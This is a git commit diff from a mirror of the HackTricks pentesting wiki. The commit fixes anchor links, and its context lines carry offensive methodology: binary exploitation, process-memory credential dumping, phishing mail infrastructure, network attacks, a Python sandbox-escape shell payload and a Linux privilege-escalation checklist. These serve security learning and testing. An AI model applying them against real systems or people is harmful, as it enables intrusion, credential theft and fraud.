maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

fix links

Browse Source
This commit is contained in:
Carlos Polop 2025-01-04 01:40:31 +01:00
parent 0279bd7491
commit 6eca4dfedd
92 changed files with 319 additions and 319 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
src/binary-exploitation/basic-stack-binary-exploitation-methodology/README.md
View File

@ -51,12 +51,12 @@ Something to take into account is that usually **just one exploitation of a vuln
### Goal: Call an Existing function
- [**ret2win**](./#ret2win): There is a function in the code you need to call (maybe with some specific params) in order to get the flag.
- [**ret2win**](#ret2win): There is a function in the code you need to call (maybe with some specific params) in order to get the flag.
- In a **regular bof without** [**PIE**](../common-binary-protections-and-bypasses/pie/) **and** [**canary**](../common-binary-protections-and-bypasses/stack-canaries/) you just need to write the address in the return address stored in the stack.
- In a bof with [**PIE**](../common-binary-protections-and-bypasses/pie/), you will need to bypass it
- In a bof with [**canary**](../common-binary-protections-and-bypasses/stack-canaries/), you will need to bypass it
- If you need to set several parameter to correctly call the **ret2win** function you can use:
- A [**ROP**](./#rop-and-ret2...-techniques) **chain if there are enough gadgets** to prepare all the params
- A [**ROP**](#rop-and-ret2...-techniques) **chain if there are enough gadgets** to prepare all the params
- [**SROP**](../rop-return-oriented-programing/srop-sigreturn-oriented-programming/) (in case you can call this syscall) to control a lot of registers
- Gadgets from [**ret2csu**](../rop-return-oriented-programing/ret2csu.md) and [**ret2vdso**](../rop-return-oriented-programing/ret2vdso.md) to control several registers
- Via a [**Write What Where**](../arbitrary-write-2-exec/) you could abuse other vulns (not bof) to call the **`win`** function.
@ -68,7 +68,7 @@ Something to take into account is that usually **just one exploitation of a vuln
#### Via shellcode, if nx disabled or mixing shellcode with ROP:
- [**(Stack) Shellcode**](./#stack-shellcode): This is useful to store a shellcode in the stack before of after overwriting the return pointer and then **jump to it** to execute it:
- [**(Stack) Shellcode**](#stack-shellcode): This is useful to store a shellcode in the stack before of after overwriting the return pointer and then **jump to it** to execute it:
- **In any case, if there is a** [**canary**](../common-binary-protections-and-bypasses/stack-canaries/)**,** in a regular bof you will need to bypass (leak) it
- **Without** [**ASLR**](../common-binary-protections-and-bypasses/aslr/) **and** [**nx**](../common-binary-protections-and-bypasses/no-exec-nx.md) it's possible to jump to the address of the stack as it won't never change
- **With** [**ASLR**](../common-binary-protections-and-bypasses/aslr/) you will need techniques such as [**ret2esp/ret2reg**](../rop-return-oriented-programing/ret2esp-ret2reg.md) to jump to it

2
src/binary-exploitation/libc-heap/heap-overflow.md
View File

@ -9,7 +9,7 @@ A heap overflow is like a [**stack overflow**](../stack-overflow/) but in the he
In stack overflows we know that some registers like the instruction pointer or the stack frame are going to be restored from the stack and it could be possible to abuse this. In case of heap overflows, there **isn't any sensitive information stored by default** in the heap chunk that can be overflowed. However, it could be sensitive information or pointers, so the **criticality** of this vulnerability **depends** on **which data could be overwritten** and how an attacker could abuse this.
> [!TIP]
> In order to find overflow offsets you can use the same patterns as in [**stack overflows**](../stack-overflow/#finding-stack-overflows-offsets).
> In order to find overflow offsets you can use the same patterns as in [**stack overflows**](../stack-overflow/index.html#finding-stack-overflows-offsets).
### Stack Overflows vs Heap Overflows

2
src/forensics/basic-forensic-methodology/docker-forensics.md
View File

@ -115,7 +115,7 @@ for d in `find * -maxdepth 0 -type d`; do cd $d; tar -xf ./layer.tar; cd ..; don
Note that when you run a docker container inside a host **you can see the processes running on the container from the host** just running `ps -ef`
Therefore (as root) you can **dump the memory of the processes** from the host and search for **credentials** just [**like in the following example**](../../linux-hardening/privilege-escalation/#process-memory).
Therefore (as root) you can **dump the memory of the processes** from the host and search for **credentials** just [**like in the following example**](../../linux-hardening/privilege-escalation/index.html#process-memory).
{{#include ../../banners/hacktricks-training.md}}

2
src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md
View File

@ -65,7 +65,7 @@ Then you can use the tool [**DataProtectionDecryptor**](https://nirsoft.net/util
![](<../../../images/image (448).png>)
If everything goes as expected, the tool will indicate the **primary key** that you need to **use to recover the original one**. To recover the original one, just use this [cyber_chef receipt](<https://gchq.github.io/CyberChef/#recipe=Derive_PBKDF2_key(%7B'option':'Hex','string':'98FD6A76ECB87DE8DAB4623123402167'%7D,128,1066,'SHA1',%7B'option':'Hex','string':'0D638C092E8B82FC452883F95F355B8E'%7D)>) putting the primary key as the "passphrase" inside the receipt.
If everything goes as expected, the tool will indicate the **primary key** that you need to **use to recover the original one**. To recover the original one, just use this [cyber_chef receipt](<https://gchq.github.io/CyberChef/index.html#recipe=Derive_PBKDF2_key(%7B'option':'Hex','string':'98FD6A76ECB87DE8DAB4623123402167'%7D,128,1066,'SHA1',%7B'option':'Hex','string':'0D638C092E8B82FC452883F95F355B8E'%7D)>) putting the primary key as the "passphrase" inside the receipt.
The resulting hex is the final key used to encrypt the databases which can be decrypted with:

2
src/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics.md
View File

@ -115,7 +115,7 @@ for d in `find * -maxdepth 0 -type d`; do cd $d; tar -xf ./layer.tar; cd ..; don
Note that when you run a docker container inside a host **you can see the processes running on the container from the host** just running `ps -ef`
Therefore (as root) you can **dump the memory of the processes** from the host and search for **credentials** just [**like in the following example**](../../linux-hardening/privilege-escalation/#process-memory).
Therefore (as root) you can **dump the memory of the processes** from the host and search for **credentials** just [**like in the following example**](../../linux-hardening/privilege-escalation/index.html#process-memory).
{{#include ../../banners/hacktricks-training.md}}

2
src/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md
View File

@ -155,7 +155,7 @@ The plugin `banners.Banners` can be used in **vol3 to try to find linux banners*
## Hashes/Passwords
Extract SAM hashes, [domain cached credentials](../../../windows-hardening/stealing-credentials/credentials-protections.md#cached-credentials) and [lsa secrets](../../../windows-hardening/authentication-credentials-uac-and-efs/#lsa-secrets).
Extract SAM hashes, [domain cached credentials](../../../windows-hardening/stealing-credentials/credentials-protections.md#cached-credentials) and [lsa secrets](../../../windows-hardening/authentication-credentials-uac-and-efs/index.html#lsa-secrets).
{{#tabs}}
{{#tab name="vol3"}}

2
src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md
View File

@ -65,7 +65,7 @@ Then you can use the tool [**DataProtectionDecryptor**](https://nirsoft.net/util
![](<../../../images/image (443).png>)
If everything goes as expected, the tool will indicate the **primary key** that you need to **use to recover the original one**. To recover the original one, just use this [cyber_chef receipt](<https://gchq.github.io/CyberChef/#recipe=Derive_PBKDF2_key(%7B'option':'Hex','string':'98FD6A76ECB87DE8DAB4623123402167'%7D,128,1066,'SHA1',%7B'option':'Hex','string':'0D638C092E8B82FC452883F95F355B8E'%7D)>) putting the primary key as the "passphrase" inside the receipt.
If everything goes as expected, the tool will indicate the **primary key** that you need to **use to recover the original one**. To recover the original one, just use this [cyber_chef receipt](<https://gchq.github.io/CyberChef/index.html#recipe=Derive_PBKDF2_key(%7B'option':'Hex','string':'98FD6A76ECB87DE8DAB4623123402167'%7D,128,1066,'SHA1',%7B'option':'Hex','string':'0D638C092E8B82FC452883F95F355B8E'%7D)>) putting the primary key as the "passphrase" inside the receipt.
The resulting hex is the final key used to encrypt the databases which can be decrypted with:

12
src/generic-methodologies-and-resources/external-recon-methodology/README.md
View File

@ -61,7 +61,7 @@ You can find the IP and ASN of a domain using [http://ipv4info.com/](http://ipv4
### **Looking for vulnerabilities**
At this point we known **all the assets inside the scope**, so if you are allowed you could launch some **vulnerability scanner** (Nessus, OpenVAS) over all the hosts.\
Also, you could launch some [**port scans**](../pentesting-network/#discovering-hosts-from-the-outside) **or use services like** shodan **to find** open ports **and depending on what you find you should** take a look in this book to how to pentest several possible services running.\
Also, you could launch some [**port scans**](../pentesting-network/index.html#discovering-hosts-from-the-outside) **or use services like** shodan **to find** open ports **and depending on what you find you should** take a look in this book to how to pentest several possible services running.\
**Also, It could be worth it to mention that you can also prepare some** default username **and** passwords **lists and try to** bruteforce services with [https://github.com/x90skysn3k/brutespray](https://github.com/x90skysn3k/brutespray).
## Domains
@ -195,7 +195,7 @@ You could access the **TLS certificate** of the main web page, obtain the **Orga
Check for some [domain takeover](../../pentesting-web/domain-subdomain-takeover.md#domain-takeover). Maybe some company is **using some a domain** but they **lost the ownership**. Just register it (if cheap enough) and let know the company.
If you find any **domain with an IP different** from the ones you already found in the assets discovery, you should perform a **basic vulnerability scan** (using Nessus or OpenVAS) and some [**port scan**](../pentesting-network/#discovering-hosts-from-the-outside) with **nmap/masscan/shodan**. Depending on which services are running you can find in **this book some tricks to "attack" them**.\
If you find any **domain with an IP different** from the ones you already found in the assets discovery, you should perform a **basic vulnerability scan** (using Nessus or OpenVAS) and some [**port scan**](../pentesting-network/index.html#discovering-hosts-from-the-outside) with **nmap/masscan/shodan**. Depending on which services are running you can find in **this book some tricks to "attack" them**.\
&#xNAN;_&#x4E;ote that sometimes the domain is hosted inside an IP that is not controlled by the client, so it's not in the scope, be careful._
## Subdomains
@ -538,7 +538,7 @@ You can **monitor** if **new subdomains** of a domain are created by monitoring
Check for possible [**subdomain takeovers**](../../pentesting-web/domain-subdomain-takeover.md#subdomain-takeover).\
If the **subdomain** is pointing to some **S3 bucket**, [**check the permissions**](../../network-services-pentesting/pentesting-web/buckets/).
If you find any **subdomain with an IP different** from the ones you already found in the assets discovery, you should perform a **basic vulnerability scan** (using Nessus or OpenVAS) and some [**port scan**](../pentesting-network/#discovering-hosts-from-the-outside) with **nmap/masscan/shodan**. Depending on which services are running you can find in **this book some tricks to "attack" them**.\
If you find any **subdomain with an IP different** from the ones you already found in the assets discovery, you should perform a **basic vulnerability scan** (using Nessus or OpenVAS) and some [**port scan**](../pentesting-network/index.html#discovering-hosts-from-the-outside) with **nmap/masscan/shodan**. Depending on which services are running you can find in **this book some tricks to "attack" them**.\
&#xNAN;_&#x4E;ote that sometimes the subdomain is hosted inside an IP that is not controlled by the client, so it's not in the scope, be careful._
## IPs
@ -566,7 +566,7 @@ In the previous steps you have probably already performed some **recon of the IP
Please, note that this will be **oriented for web apps discovery**, so you should **perform the vulnerability** and **port scanning** also (**if allowed** by the scope).
A **fast method** to discover **ports open** related to **web** servers using [**masscan** can be found here](../pentesting-network/#http-port-discovery).\
A **fast method** to discover **ports open** related to **web** servers using [**masscan** can be found here](../pentesting-network/index.html#http-port-discovery).\
Another friendly tool to look for web servers is [**httprobe**](https://github.com/tomnomnom/httprobe)**,** [**fprobe**](https://github.com/theblackturtle/fprobe) and [**httpx**](https://github.com/projectdiscovery/httpx). You just pass a list of domains and it will try to connect to port 80 (http) and 443 (https). Additionally, you can indicate to try other ports:
```bash
@ -592,7 +592,7 @@ You will also need wordlists of **common words used in buckets**:
- [https://raw.githubusercontent.com/infosec-au/altdns/master/words.txt](https://raw.githubusercontent.com/infosec-au/altdns/master/words.txt)
- [https://raw.githubusercontent.com/jordanpotti/AWSBucketDump/master/BucketNames.txt](https://raw.githubusercontent.com/jordanpotti/AWSBucketDump/master/BucketNames.txt)
Then, with those words you should generate **permutations** (check the [**Second Round DNS Brute-Force**](./#second-dns-bruteforce-round) for more info).
Then, with those words you should generate **permutations** (check the [**Second Round DNS Brute-Force**](#second-dns-bruteforce-round) for more info).
With the resulting wordlists you could use tools such as [**cloud_enum**](https://github.com/initstring/cloud_enum)**,** [**CloudScraper**](https://github.com/jordanpotti/CloudScraper)**,** [**cloudlist**](https://github.com/projectdiscovery/cloudlist) **or** [**S3Scanner**](https://github.com/sa7mon/S3Scanner)**.**
@ -678,7 +678,7 @@ There are also free services that allow you to **scan public repositories**, suc
The **majority of the vulnerabilities** found by bug hunters resides inside **web applications**, so at this point I would like to talk about a **web application testing methodology**, and you can [**find this information here**](../../network-services-pentesting/pentesting-web/).
I also want to do a special mention to the section [**Web Automated Scanners open source tools**](../../network-services-pentesting/pentesting-web/#automatic-scanners), as, if you shouldn't expect them to find you very sensitive vulnerabilities, they come handy to implement them on **workflows to have some initial web information.**
I also want to do a special mention to the section [**Web Automated Scanners open source tools**](../../network-services-pentesting/pentesting-web/index.html#automatic-scanners), as, if you shouldn't expect them to find you very sensitive vulnerabilities, they come handy to implement them on **workflows to have some initial web information.**
## Recapitulation

10
src/generic-methodologies-and-resources/pentesting-methodology.md
View File

@ -13,7 +13,7 @@ _Hacktricks logos designed by_ [_@ppiernacho_](https://www.instagram.com/ppieran
Do you have **physical access** to the machine that you want to attack? You should read some [**tricks about physical attacks**](../hardware-physical-access/physical-attacks.md) and others about [**escaping from GUI applications**](../hardware-physical-access/escaping-from-gui-applications.md).
### 1 - [Discovering hosts inside the network ](pentesting-network/#discovering-hosts)/ [Discovering Assets of the company](external-recon-methodology/)
### 1 - [Discovering hosts inside the network ](pentesting-network/index.html#discovering-hosts)/ [Discovering Assets of the company](external-recon-methodology/)
**Depending** if the **test** you are perform is an **internal or external test** you may be interested on finding **hosts inside the company network** (internal test) or **finding assets of the company on the internet** (external test).
@ -23,11 +23,11 @@ Do you have **physical access** to the machine that you want to attack? You shou
### **2-** [**Having Fun with the network**](pentesting-network/) **(Internal)**
**This section only applies if you are performing an internal test.**\
Before attacking a host maybe you prefer to **steal some credentials** **from the network** or **sniff** some **data** to learn **passively/actively(MitM)** what can you find inside the network. You can read [**Pentesting Network**](pentesting-network/#sniffing).
Before attacking a host maybe you prefer to **steal some credentials** **from the network** or **sniff** some **data** to learn **passively/actively(MitM)** what can you find inside the network. You can read [**Pentesting Network**](pentesting-network/index.html#sniffing).
### 3- [Port Scan - Service discovery](pentesting-network/#scanning-hosts)
### 3- [Port Scan - Service discovery](pentesting-network/index.html#scanning-hosts)
The first thing to do when **looking for vulnerabilities in a host** is to know which **services are running** in which ports. Let's see the[ **basic tools to scan ports of hosts**](pentesting-network/#scanning-hosts).
The first thing to do when **looking for vulnerabilities in a host** is to know which **services are running** in which ports. Let's see the[ **basic tools to scan ports of hosts**](pentesting-network/index.html#scanning-hosts).
### **4-** [Searching service version exploits](../generic-hacking/search-exploits.md)
@ -103,7 +103,7 @@ Find here different ways to [**dump passwords in Windows**](https://github.com/c
#### 11.2 - Persistence
**Use 2 or 3 different types of persistence mechanism so you won't need to exploit the system again.**\
**Here you can find some** [**persistence tricks on active directory**](../windows-hardening/active-directory-methodology/#persistence)**.**
**Here you can find some** [**persistence tricks on active directory**](../windows-hardening/active-directory-methodology/index.html#persistence)**.**
TODO: Complete persistence Post in Windows & Linux

6
src/generic-methodologies-and-resources/pentesting-network/README.md
View File

@ -87,7 +87,7 @@ set net.show.meta true #more info
### Active
Note that the techniques commented in [_**Discovering hosts from the outside**_](./#discovering-hosts-from-the-outside) (_TCP/HTTP/UDP/SCTP Port Discovery_) can be also **applied here**.\
Note that the techniques commented in [_**Discovering hosts from the outside**_](#discovering-hosts-from-the-outside) (_TCP/HTTP/UDP/SCTP Port Discovery_) can be also **applied here**.\
But, as you are in the **same network** as the other hosts, you can do **more things**:
```bash
@ -112,7 +112,7 @@ alive6 <IFACE> # Send a pingv6 to multicast.
### Active ICMP
Note that the techniques commented in _Discovering hosts from the outside_ ([_**ICMP**_](./#icmp)) can be also **applied here**.\
Note that the techniques commented in _Discovering hosts from the outside_ ([_**ICMP**_](#icmp)) can be also **applied here**.\
But, as you are in the **same network** as the other hosts, you can do **more things**:
- If you **ping** a **subnet broadcast address** the ping should be arrive to **each host** and they could **respond** to **you**: `ping -b 10.10.5.255`
@ -662,7 +662,7 @@ yersinia dhcp -attack 2 #More parameters are needed
### ARP Spoofing
Check the [previous section](./#arp-spoofing).
Check the [previous section](#arp-spoofing).
### ICMPRedirect

2
src/generic-methodologies-and-resources/pentesting-wifi/README.md
View File

@ -608,7 +608,7 @@ You can create an **Evil Twin using WPA/2** and if the devices have configured t
### Enterprise Evil Twin
To understand this attacks I would recommend to read before the brief [WPA Enterprise explanation](./#wpa-enterprise-mgt).
To understand this attacks I would recommend to read before the brief [WPA Enterprise explanation](#wpa-enterprise-mgt).
**Using hostapd-wpe**

8
src/generic-methodologies-and-resources/phishing-methodology/README.md
View File

@ -73,7 +73,7 @@ In order to make sure that the expired domain that you are going to buy **has al
- [https://hunter.io/](https://hunter.io)
- [https://anymailfinder.com/](https://anymailfinder.com)
In order to **discover more** valid email addresses or **verify the ones** you have already discovered you can check if you can brute-force them smtp servers of the victim. [Learn how to verify/discover email address here](../../network-services-pentesting/pentesting-smtp/#username-bruteforce-enumeration).\
In order to **discover more** valid email addresses or **verify the ones** you have already discovered you can check if you can brute-force them smtp servers of the victim. [Learn how to verify/discover email address here](../../network-services-pentesting/pentesting-smtp/index.html#username-bruteforce-enumeration).\
Moreover, don't forget that if the users use **any web portal to access their mails**, you can check if it's vulnerable to **username brute force**, and exploit the vulnerability if possible.
## Configuring GoPhish
@ -245,7 +245,7 @@ Set a rDNS (PTR) record that resolves the IP address of the VPS to the domain na
### Sender Policy Framework (SPF) Record
You must **configure a SPF record for the new domain**. If you don't know what is a SPF record [**read this page**](../../network-services-pentesting/pentesting-smtp/#spf).
You must **configure a SPF record for the new domain**. If you don't know what is a SPF record [**read this page**](../../network-services-pentesting/pentesting-smtp/index.html#spf).
You can use [https://www.spfwizard.net/](https://www.spfwizard.net) to generate your SPF policy (use the IP of the VPS machine)
@ -259,7 +259,7 @@ v=spf1 mx a ip4:ip.ip.ip.ip ?all
### Domain-based Message Authentication, Reporting & Conformance (DMARC) Record
You must **configure a DMARC record for the new domain**. If you don't know what is a DMARC record [**read this page**](../../network-services-pentesting/pentesting-smtp/#dmarc).
You must **configure a DMARC record for the new domain**. If you don't know what is a DMARC record [**read this page**](../../network-services-pentesting/pentesting-smtp/index.html#dmarc).
You have to create a new DNS TXT record pointing the hostname `_dmarc.<domain>` with the following content:
@ -269,7 +269,7 @@ v=DMARC1; p=none
### DomainKeys Identified Mail (DKIM)
You must **configure a DKIM for the new domain**. If you don't know what is a DMARC record [**read this page**](../../network-services-pentesting/pentesting-smtp/#dkim).
You must **configure a DKIM for the new domain**. If you don't know what is a DMARC record [**read this page**](../../network-services-pentesting/pentesting-smtp/index.html#dkim).
This tutorial is based on: [https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-dkim-with-postfix-on-debian-wheezy](https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-dkim-with-postfix-on-debian-wheezy)

2
src/generic-methodologies-and-resources/python/README.md
View File

@ -6,7 +6,7 @@
**Interesting pages to check:**
- [**Pyscript hacking tricks**](pyscript.md)
- [**Python deserializations**](../../pentesting-web/deserialization/#python)
- [**Python deserializations**](../../pentesting-web/deserialization/index.html#python)
- [**Tricks to bypass python sandboxes**](bypass-python-sandboxes/)
- [**Basic python web requests syntax**](web-requests.md)
- [**Basic python syntax and libraries**](basic-python.md)

8
src/generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md
View File

@ -391,7 +391,7 @@ get_flag.__globals__['__builtins__']
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "builtins" in x.__init__.__globals__ ][0]["builtins"]
```
[**Below there is a bigger function**](./#recursive-search-of-builtins-globals) to find tens/**hundreds** of **places** were you can find the **builtins**.
[**Below there is a bigger function**](#recursive-search-of-builtins-globals) to find tens/**hundreds** of **places** were you can find the **builtins**.
#### Python2 and Python3
@ -439,7 +439,7 @@ class_obj.__init__.__globals__
[<class '_frozen_importlib._ModuleLock'>, <class '_frozen_importlib._DummyModuleLock'>, <class '_frozen_importlib._ModuleLockManager'>, <class '_frozen_importlib.ModuleSpec'>, <class '_frozen_importlib_external.FileLoader'>, <class '_frozen_importlib_external._NamespacePath'>, <class '_frozen_importlib_external._NamespaceLoader'>, <class '_frozen_importlib_external.FileFinder'>, <class 'zipimport.zipimporter'>, <class 'zipimport._ZipImportResourceReader'>, <class 'codecs.IncrementalEncoder'>, <class 'codecs.IncrementalDecoder'>, <class 'codecs.StreamReaderWriter'>, <class 'codecs.StreamRecoder'>, <class 'os._wrap_close'>, <class '_sitebuiltins.Quitter'>, <class '_sitebuiltins._Printer'>, <class 'types.DynamicClassAttribute'>, <class 'types._GeneratorWrapper'>, <class 'warnings.WarningMessage'>, <class 'warnings.catch_warnings'>, <class 'reprlib.Repr'>, <class 'functools.partialmethod'>, <class 'functools.singledispatchmethod'>, <class 'functools.cached_property'>, <class 'contextlib._GeneratorContextManagerBase'>, <class 'contextlib._BaseExitStack'>, <class 'sre_parse.State'>, <class 'sre_parse.SubPattern'>, <class 'sre_parse.Tokenizer'>, <class 're.Scanner'>, <class 'rlcompleter.Completer'>, <class 'dis.Bytecode'>, <class 'string.Template'>, <class 'cmd.Cmd'>, <class 'tokenize.Untokenizer'>, <class 'inspect.BlockFinder'>, <class 'inspect.Parameter'>, <class 'inspect.BoundArguments'>, <class 'inspect.Signature'>, <class 'bdb.Bdb'>, <class 'bdb.Breakpoint'>, <class 'traceback.FrameSummary'>, <class 'traceback.TracebackException'>, <class '__future__._Feature'>, <class 'codeop.Compile'>, <class 'codeop.CommandCompiler'>, <class 'code.InteractiveInterpreter'>, <class 'pprint._safe_key'>, <class 'pprint.PrettyPrinter'>, <class '_weakrefset._IterationGuard'>, <class '_weakrefset.WeakSet'>, <class 'threading._RLock'>, <class 'threading.Condition'>, <class 'threading.Semaphore'>, <class 'threading.Event'>, <class 'threading.Barrier'>, <class 'threading.Thread'>, <class 'subprocess.CompletedProcess'>, <class 'subprocess.Popen'>]
```
[**Below there is a bigger function**](./#recursive-search-of-builtins-globals) to find tens/**hundreds** of **places** were you can find the **globals**.
[**Below there is a bigger function**](#recursive-search-of-builtins-globals) to find tens/**hundreds** of **places** were you can find the **globals**.
## Discover Arbitrary Execution
@ -797,7 +797,7 @@ According to the [**TypeMonkey chall from this writeup**](https://corgi.rip/post
As reminder, every time an action is performed in python some function is executed. For example `2*3` will execute **`(2).mul(3)`** or **`{'a':'b'}['a']`** will be **`{'a':'b'}.__getitem__('a')`**.
You have more like this in the section [**Python execution without calls**](./#python-execution-without-calls).
You have more like this in the section [**Python execution without calls**](#python-execution-without-calls).
A python format string vuln doesn't allow to execute function (it's doesn't allow to use parenthesis), so it's not possible to get RCE like `'{0.system("/bin/sh")}'.format(os)`.\
However, it's possible to use `[]`. Therefore, if a common python library has a **`__getitem__`** or **`__getattr__`** method that executes arbitrary code, it's possible to abuse them to get RCE.
@ -876,7 +876,7 @@ get_flag.__globals__
CustomClassObject.__class__.__init__.__globals__
```
[**See here more places to obtain globals**](./#globals-and-locals)
[**See here more places to obtain globals**](#globals-and-locals)
### **Accessing the function code**

2
src/generic-methodologies-and-resources/python/python-internal-read-gadgets.md
View File

@ -4,7 +4,7 @@
## Basic Information
Different vulnerabilities such as [**Python Format Strings**](bypass-python-sandboxes/#python-format-string) or [**Class Pollution**](class-pollution-pythons-prototype-pollution.md) might allow you to **read python internal data but won't allow you to execute code**. Therefore, a pentester will need to make the most of these read permissions to **obtain sensitive privileges and escalate the vulnerability**.
Different vulnerabilities such as [**Python Format Strings**](bypass-python-sandboxes/index.html#python-format-string) or [**Class Pollution**](class-pollution-pythons-prototype-pollution.md) might allow you to **read python internal data but won't allow you to execute code**. Therefore, a pentester will need to make the most of these read permissions to **obtain sensitive privileges and escalate the vulnerability**.
### Flask - Read secret key

94
src/linux-hardening/linux-privilege-escalation-checklist.md
View File

@ -4,29 +4,29 @@
### **Best tool to look for Linux local privilege escalation vectors:** [**LinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS)
### [System Information](privilege-escalation/#system-information)
### [System Information](privilege-escalation/index.html#system-information)
- [ ] Get **OS information**
- [ ] Check the [**PATH**](privilege-escalation/#path), any **writable folder**?
- [ ] Check [**env variables**](privilege-escalation/#env-info), any sensitive detail?
- [ ] Search for [**kernel exploits**](privilege-escalation/#kernel-exploits) **using scripts** (DirtyCow?)
- [ ] **Check** if the [**sudo version** is vulnerable](privilege-escalation/#sudo-version)
- [ ] [**Dmesg** signature verification failed](privilege-escalation/#dmesg-signature-verification-failed)
- [ ] More system enum ([date, system stats, cpu info, printers](privilege-escalation/#more-system-enumeration))
- [ ] [Enumerate more defenses](privilege-escalation/#enumerate-possible-defenses)
- [ ] Check the [**PATH**](privilege-escalation/index.html#path), any **writable folder**?
- [ ] Check [**env variables**](privilege-escalation/index.html#env-info), any sensitive detail?
- [ ] Search for [**kernel exploits**](privilege-escalation/index.html#kernel-exploits) **using scripts** (DirtyCow?)
- [ ] **Check** if the [**sudo version** is vulnerable](privilege-escalation/index.html#sudo-version)
- [ ] [**Dmesg** signature verification failed](privilege-escalation/index.html#dmesg-signature-verification-failed)
- [ ] More system enum ([date, system stats, cpu info, printers](privilege-escalation/index.html#more-system-enumeration))
- [ ] [Enumerate more defenses](privilege-escalation/index.html#enumerate-possible-defenses)
### [Drives](privilege-escalation/#drives)
### [Drives](privilege-escalation/index.html#drives)
- [ ] **List mounted** drives
- [ ] **Any unmounted drive?**
- [ ] **Any creds in fstab?**
### [**Installed Software**](privilege-escalation/#installed-software)
### [**Installed Software**](privilege-escalation/index.html#installed-software)
- [ ] **Check for**[ **useful software**](privilege-escalation/#useful-software) **installed**
- [ ] **Check for** [**vulnerable software**](privilege-escalation/#vulnerable-software-installed) **installed**
- [ ] **Check for**[ **useful software**](privilege-escalation/index.html#useful-software) **installed**
- [ ] **Check for** [**vulnerable software**](privilege-escalation/index.html#vulnerable-software-installed) **installed**
### [Processes](privilege-escalation/#processes)
### [Processes](privilege-escalation/index.html#processes)
- [ ] Is any **unknown software running**?
- [ ] Is any software running with **more privileges than it should have**?
@ -35,40 +35,40 @@
- [ ] **Monitor processes** and check if any interesting process is running frequently.
- [ ] Can you **read** some interesting **process memory** (where passwords could be saved)?
### [Scheduled/Cron jobs?](privilege-escalation/#scheduled-jobs)
### [Scheduled/Cron jobs?](privilege-escalation/index.html#scheduled-jobs)
- [ ] Is the [**PATH** ](privilege-escalation/#cron-path)being modified by some cron and you can **write** in it?
- [ ] Any [**wildcard** ](privilege-escalation/#cron-using-a-script-with-a-wildcard-wildcard-injection)in a cron job?
- [ ] Some [**modifiable script** ](privilege-escalation/#cron-script-overwriting-and-symlink)is being **executed** or is inside **modifiable folder**?
- [ ] Have you detected that some **script** could be or are being [**executed** very **frequently**](privilege-escalation/#frequent-cron-jobs)? (every 1, 2 or 5 minutes)
- [ ] Is the [**PATH** ](privilege-escalation/index.html#cron-path)being modified by some cron and you can **write** in it?
- [ ] Any [**wildcard** ](privilege-escalation/index.html#cron-using-a-script-with-a-wildcard-wildcard-injection)in a cron job?
- [ ] Some [**modifiable script** ](privilege-escalation/index.html#cron-script-overwriting-and-symlink)is being **executed** or is inside **modifiable folder**?
- [ ] Have you detected that some **script** could be or are being [**executed** very **frequently**](privilege-escalation/index.html#frequent-cron-jobs)? (every 1, 2 or 5 minutes)
### [Services](privilege-escalation/#services)
### [Services](privilege-escalation/index.html#services)
- [ ] Any **writable .service** file?
- [ ] Any **writable binary** executed by a **service**?
- [ ] Any **writable folder in systemd PATH**?
### [Timers](privilege-escalation/#timers)
### [Timers](privilege-escalation/index.html#timers)
- [ ] Any **writable timer**?
### [Sockets](privilege-escalation/#sockets)
### [Sockets](privilege-escalation/index.html#sockets)
- [ ] Any **writable .socket** file?
- [ ] Can you **communicate with any socket**?
- [ ] **HTTP sockets** with interesting info?
### [D-Bus](privilege-escalation/#d-bus)
### [D-Bus](privilege-escalation/index.html#d-bus)
- [ ] Can you **communicate with any D-Bus**?
### [Network](privilege-escalation/#network)
### [Network](privilege-escalation/index.html#network)
- [ ] Enumerate the network to know where you are
- [ ] **Open ports you couldn't access before** getting a shell inside the machine?
- [ ] Can you **sniff traffic** using `tcpdump`?
### [Users](privilege-escalation/#users)
### [Users](privilege-escalation/index.html#users)
- [ ] Generic users/groups **enumeration**
- [ ] Do you have a **very big UID**? Is the **machine** **vulnerable**?
@ -77,43 +77,43 @@
- [ ] Password Policy?
- [ ] Try to **use** every **known password** that you have discovered previously to login **with each** possible **user**. Try to login also without a password.
### [Writable PATH](privilege-escalation/#writable-path-abuses)
### [Writable PATH](privilege-escalation/index.html#writable-path-abuses)
- [ ] If you have **write privileges over some folder in PATH** you may be able to escalate privileges
### [SUDO and SUID commands](privilege-escalation/#sudo-and-suid)
### [SUDO and SUID commands](privilege-escalation/index.html#sudo-and-suid)
- [ ] Can you execute **any command with sudo**? Can you use it to READ, WRITE or EXECUTE anything as root? ([**GTFOBins**](https://gtfobins.github.io))
- [ ] Is any **exploitable SUID binary**? ([**GTFOBins**](https://gtfobins.github.io))
- [ ] Are [**sudo** commands **limited** by **path**? can you **bypass** the restrictions](privilege-escalation/#sudo-execution-bypassing-paths)?
- [ ] [**Sudo/SUID binary without path indicated**](privilege-escalation/#sudo-command-suid-binary-without-command-path)?
- [ ] [**SUID binary specifying path**](privilege-escalation/#suid-binary-with-command-path)? Bypass
- [ ] [**LD_PRELOAD vuln**](privilege-escalation/#ld_preload)
- [ ] [**Lack of .so library in SUID binary**](privilege-escalation/#suid-binary-so-injection) from a writable folder?
- [ ] [**SUDO tokens available**](privilege-escalation/#reusing-sudo-tokens)? [**Can you create a SUDO token**](privilege-escalation/#var-run-sudo-ts-less-than-username-greater-than)?
- [ ] Can you [**read or modify sudoers files**](privilege-escalation/#etc-sudoers-etc-sudoers-d)?
- [ ] Can you [**modify /etc/ld.so.conf.d/**](privilege-escalation/#etc-ld-so-conf-d)?
- [ ] [**OpenBSD DOAS**](privilege-escalation/#doas) command
- [ ] Are [**sudo** commands **limited** by **path**? can you **bypass** the restrictions](privilege-escalation/index.html#sudo-execution-bypassing-paths)?
